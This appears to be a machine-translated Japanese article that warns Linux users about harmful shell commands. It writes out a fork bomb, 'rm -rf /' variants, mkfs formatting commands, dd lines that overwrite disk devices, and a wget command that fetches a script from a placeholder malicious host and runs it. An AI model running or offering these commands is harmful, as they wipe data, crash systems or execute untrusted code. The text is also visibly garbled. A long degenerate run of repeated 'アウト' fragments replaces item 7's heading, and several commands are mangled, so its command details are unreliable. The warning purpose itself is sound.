Linux シェル/ターミナル コマンドは非常に強力で、単純なコマンドでもフォルダー、ファイル、またはパス フォルダーが削除される可能性があります。
場合によっては、Linux が何も要求せずにコマンドを直接実行し、さまざまなデータ情報が失われることがあります。
一般的に、新しい Linux ユーザーは Web 上でこれらのコマンドを実行することをお勧めします。もちろん、このコードを書いた人の中には、そう思わない人もいます。一度書き留めてしまえば、これはもはや冗談ではないからです。 。
ここでは、システムに有害な Linux コードをいくつか集めて、それらを回避できるようにしました。覚えておいてください: このコードは非常に危険であり、さらに有害になるように変更される可能性もあります。
他にも注意すべき点があります。一部のコマンドは、Ubuntu で sudo プレフィックスが付いている場合にのみ有害です。 Linux の他のディストリビューションは、ルート ディレクトリ コマンドとして使用すると有害になります。
1. Linux Fork Bomb コマンド
:(){ :: &};: Fork Bomb として知られる、Linux システムに対するサービス拒否攻撃です。 :(){ :: & };: は bash 関数です。実行される限り、システムがフリーズするまで繰り返されます。
この問題を解決するには、システムを再起動する必要があります。したがって、Linux インターフェイスでこのコマンドを実行するときは、必ず注意してください。
2. Mv Folder/Dev/Null コマンド
mv Folder/dev/null も危険なコマンドです。 Dev/null または null デバイスは、このデバイス ファイルに書き込まれたすべてのデータを削除するデバイス ファイルです。ただし、操作プロンプトでは、書き込み操作が正常に実行されたことが示されます。これは、私たちがよくビットバックまたはブラック ホールと呼ぶものです。
3. Rm -Rf コマンド
rm -rf コマンドは、Linux システムのフォルダーとその内容をすばやく削除できます。正しい使い方を知らないと、ただ泣くだけです。
以下は、m-rf コマンドの最も一般的な組み合わせと選択肢です:
rm コマンド: Linux システム内のファイルを削除します
rm -f コマンド: プロンプトを表示せずにファイル内の読み取り専用ファイルを削除します
rm -r コマンド ループファイルの削除 フォルダーの内容
rm -d コマンド: 空のディレクトリを削除します。 ディレクトリが空でない場合、操作は実行されません。
rm -rf/ コマンド: すべての内容とサブフォルダー (書き込みを含む) を強制的に削除します。 -protected ファイル) はルート ディレクトリにあります。
rm -rf* コマンド: 現在のディレクトリ (現在の作業ディレクトリ) およびサブフォルダー内のすべてのコンテンツを強制的に削除します。
rm -rf コマンド: 現在のフォルダー ディレクトリ/サブフォルダー内のすべてのコンテンツを強制的に削除します。 rm -r.[^.]*
rm -r.[^.]* コマンドと同じ: 削除プロンプトでファイルとフォルダーを削除します
4.
mkfs の機能を知らない場合、これは危険なコマンドでもあります。mkfs の後に書かれたコマンドはフォーマットされ、空の Linux ファイル システムに置き換えられます。
ハードディスクをフォーマットするには管理者権限が必要なコマンドは次のとおりです:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat
mkfs。 cramfs 上記のコードと同じことを行うこともできますが、ソースのアクセス許可を管理する必要はありません。
5. Tar Bomb
tar コマンドは、複数のファイルを .tar 形式で 1 つのファイル (アーカイブ ファイル) にまとめるために使用されます。テープ アーカイブ (タール) 爆弾は彼によって作成できます。
圧縮されると、このアーカイブ ファイルによって、新しいディレクトリではなく現在のディレクトリに表示される、同様の名前のファイルが数万個生成されます。
tar ファイルを受信するときは、定期的に新しい保護されたディレクトリを作成し、解凍する前に受信した tar ファイルをこのディレクトリに配置すると、tar 爆弾の被害者になることを避けることができます。
6. Dd コマンド
Dd コマンドは、ハードディスクのパーティションをコピーおよび変更するために使用されます。間違った場所で使用すると危険です。
dd コマンドは以下にリストされています:
dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if =something of=/dev/sda
アウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウトアウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウト アウトout'' out's' out's' out's' ' Out's ' Out's '' ‐ out's' ' out's' out's' out' out' out out ‐‐時々、他の人に攻撃されるかもしれないので、シェルスクリプトファイルを与えてください。そしてそれをダウンロードして実行させます。スクリプトには悪意のあるコードまたは危険なコードが含まれている可能性があります。コマンド形式は次のようになります: wget http://some_malicious_source -O- sh。 wget は sh ナロースクリプトを実行するときにスクリプトをダウンロードします。
8. 悪意のあるソースコード
もしかしたら、誰かがあなたにソースコードを渡してコンパイルさせてくれるかもしれません。コードは通常のコードである可能性がありますが、大規模なソース コードの中に悪意のあるコードが隠されている可能性があります。その場合、システムは脆弱です。それを避けるにはどうすればよいでしょうか?信頼できるソースからのソース コードのみが受け入れられ、コンパイルされます。
9. 解凍爆弾
圧縮ファイルを受け取りました。この一見小さなファイルを解凍するように求められました。そのサイズは KB 程度である可能性があります。実際、圧縮ファイルの小さいサイズには、高度に圧縮されたデータが含まれています。
ファイルが解凍される限り、数百 GB のデータが抽出されます。この時点で、大きすぎるデータがハードディスクをいっぱいにしてダウンタイムが発生する可能性が非常に高くなります。それを避けるにはどうすればよいでしょうか?古いことわざにあるように、安っぽくしないで、どんな文書でも受け入れてください。信頼できる情報源からの文書を受け入れてください。